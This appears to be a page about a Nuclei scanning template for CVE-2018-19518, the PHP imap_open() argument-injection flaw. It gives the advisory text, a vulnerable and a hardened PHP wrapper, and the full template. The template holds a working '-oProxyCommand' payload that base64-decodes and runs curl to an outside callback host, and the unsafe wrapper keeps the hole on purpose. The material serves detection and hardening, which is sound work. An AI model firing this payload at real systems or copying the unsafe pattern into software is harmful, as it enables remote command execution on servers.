
PHP imap - Remote Command Execution

ID: CVE-2018-19518

Severity: high

Author: princechaddha

Tags: imap,dast,vulhub,cve,cve2018,rce,oast,php

University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a “-oProxyCommand” argument.
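The sink the advisory describes, with a hardened wrapper beside it, as an added PHP example that is not part of the Nuclei template, the vulhub environment or the referenced exploit. The function names are assumptions for this illustration; `/norsh` is the c-client mailbox flag listed in the imap_open() documentation that disables the rsh/ssh preauth path, and `imap.enable_insecure_rsh` is the ini setting PHP 7.3 introduced (default off) for the same purpose.

```php
<?php
// Added example, not part of the Nuclei template or the referenced exploit.
// Function names (openMailboxUnsafe / openMailboxSafe) are assumptions.

// Vulnerable pattern: an attacker-controlled server name is pasted into the
// c-client mailbox spec "{server}INBOX". When rsh is a link to ssh, c-client
// runs "ssh <server> ..." and a value such as "x -oProxyCommand=..." is parsed
// by ssh as an option rather than a host name (CWE-88, argument injection).
function openMailboxUnsafe(string $server, string $user, string $pass)
{
    return imap_open('{' . $server . '}INBOX', $user, $pass);
}

// Hardened version:
//  1. accept only "host" or "host:port", where host is a DNS name or an IPv4
//     literal (IPv6 literals are deliberately not handled here);
//  2. append /norsh so c-client never attempts the rsh/ssh preauth path;
//  3. on PHP >= 7.3, require imap.enable_insecure_rsh to be off (its default).
function openMailboxSafe(string $server, string $user, string $pass)
{
    $host = $server;
    $port = null;
    if (strpos($server, ':') !== false) {
        [$host, $port] = explode(':', $server, 2);
        if (!preg_match('/^\d{1,5}$/', $port) || (int)$port < 1 || (int)$port > 65535) {
            throw new InvalidArgumentException('invalid IMAP port');
        }
    }

    // FILTER_FLAG_HOSTNAME only permits alphanumerics, dots and inner hyphens,
    // so spaces, '=' and a leading '-' (the option-injection shapes) are rejected.
    $validHost = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false
              || filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
    if (!$validHost) {
        throw new InvalidArgumentException('IMAP server name rejected');
    }

    // ini_get() returns false on PHP < 7.3, where the directive does not exist.
    $rsh = ini_get('imap.enable_insecure_rsh');
    if ($rsh !== false && filter_var($rsh, FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('imap.enable_insecure_rsh must be disabled');
    }

    $spec = '{' . $host . ($port !== null ? ':' . $port : '') . '/norsh}INBOX';
    return imap_open($spec, $user, $pass);
}

// Usage (constructed input): the first call reaches c-client, the second throws
// before any mailbox spec is built.
// openMailboxUnsafe($_GET['server'], 'user', 'pass');
// openMailboxSafe($_GET['server'], 'user', 'pass');
```

Under the hardened wrapper the template's payload never reaches c-client: it fails hostname validation because of the space and the `=`, so no outbound request is made and the interactsh matchers below stay silent. That negative result is what a patched or validated deployment should produce when the template is run against it.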

id: CVE-2018-19518

info:
  name: PHP imap - Remote Command Execution
  author: princechaddha
  severity: high
  description: |
    University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19518
    - https://www.openwall.com/lists/oss-security/2018/11/22/3
    - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2018-19518
    cwe-id: CWE-88
  metadata:
    max-request: 1
    confidence: tenative
  tags: imap,dast,vulhub,cve,cve2018,rce,oast,php

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      php-imap:
        - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}"

    fuzzing:
      - part: query
        fuzz:
          - "{{php-imap}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a004830460221008543f7f2f49f049446873dd3c5bc4fb5a4a615e4633405b40698ddf599348551022100ea2a4180689633d4ed52d2be2b916ed056f3a39bdca0a8511dce2dfb572efe27:922c64590222798bb761d5b6d8e72950

This is a Nuclei DAST template: on GET requests it substitutes the php-imap payload into each query parameter (max-request: 1) and reports a finding only when the out-of-band interactsh callback records an HTTP request whose User-Agent is curl, i.e. when the injected command actually ran on the target. Because the verdict depends on that callback, the scan needs outbound network access from the target to the interactsh server, and a silent result on a patched host is the expected outcome.

$ nuclei -u "URL" -t "dast/cves/2018/CVE-2018-19518.yaml"
